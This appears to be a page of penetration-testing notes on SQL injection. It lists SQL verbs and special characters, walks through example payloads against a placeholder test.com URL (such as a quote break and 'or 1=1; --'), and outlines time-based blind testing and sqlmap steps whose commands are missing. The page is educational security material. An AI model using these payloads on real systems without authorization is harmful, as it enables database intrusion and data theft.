SQL Injection
What is it?
Common SQL Verbs
Common SQL Statement verbs
SELECT
- Retrieves data from a tableINSERT
- Adds data to a tableDELETE
- Removes data from a dataUPDATE
- Modifies data in a tableDROP
- Delete a tableUNION
- Combines data from multiple queries
SQL Query Modifiers
WHERE
AND/OR
LIMIT #1, #2
ORDER BY #
Special Characters
'
and"
- string delimiters--
,/*
, and#
- comment delimiters*
and%
- comment delimiters;
- Ends SQL statement=
Example
When attempting a SQL injection, we ideally want to input data that will cause a syntax error, then try to get normal result with additional characters, then we can input verbs or modifiers knowing it will run.
Sample server side code
Normal input: Defender
URL: http://test.com/sqli.php?name=Defender
SQL Query:
SELECT *
FROM Users
WHERE lname='Defender';
Results: Normal result
Injected Input: Defender'
URL: http://test.com/sqli.php?name=Defender'
SQL Query:
SELECT *
FROM Users
WHERE lname='Defender'';
Results: '
causes syntax error
Injected Input: Defender'; --
URL: http://test.com/sqli.php?name=Defender'; --
SQL Query:
SELECT *
FROM Users
WHERE lname='Defender''; --;
Results: Returns normal result
Injected Input: Defender' or 1=1; --
URL: http://test.com/sqli.php?name=Defender' or 1=1; --
SQL Query:
SELECT *
FROM Users
WHERE lname='Defender' or 1=1; --;
Results: Return all rows from Users table
Balancing a payload
Quote balancing
If commenting -- does not work. We can alternatively use string statements. Example Injection: Defender' OR 'a'='a
.Example Statement: SELECT...WHERE lname='Defender' OR 'a'='a';
.
Column numbers balancing
INSERT and UNION statment require number of columns required or used
Data type balancing
INSERT and UNION statements require data type associated with columns to match
Exploiting
DB Fingerprinting
In-band SQL injection
Blind SQL injection
Test by sending input of test ' {sleep 10}
then {sleep 20}
. And see if server takes time to respond back.
Cheat Sheet
Displayed full SQL query as a value
Tools
SQLMAP
Open-source, python-based command line SQL injection tool created by Bernardo Damele A. G. (@#inquisdb)
See sqlmap extended help
Test for vulnerability
Lists Database
With found database, lets list the tables
With found tables, list all columns
Dump all records on a table
Search all columns for a string (Example "pass")
Per found table and columns, dump information of query
Within a pentest you don't want to dump sensitive information as it gets cached on your machine, instead of
--dump
you can use--count
to see amount of entries, then--dump --start=1 --stop=3
Alternatively, dump 38th entry
Grab user and password on database management system (Used to administer DB)
SQL Injection Defenses
Resources
HUGE SQL injection cheat sheet: https://www.websec.ca/kb/sql_injection
NetSPI SQL injection wiki: https://sqlwiki.netspi.com/
Time-based Blind SQL Injection: https://www.sqlinjection.net/time-based/
OWASP Blind SQL injection: https://owasp.org/www-community/attacks/Blind_SQL_Injection
NoSQL injections: https://medium.com/bugbountywriteup/nosql-injection-8732c2140576
swisskyrepo's guide to NoSQL Injections: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection
Understanding GraphQL SQL Schemas and Types: https://graphql.org/learn/schema/
by3bl33d3r's MS SQL command Reference https://github.com/byt3bl33d3r/CrackMapExec/wiki/MSSQL-Command-Reference
Last updated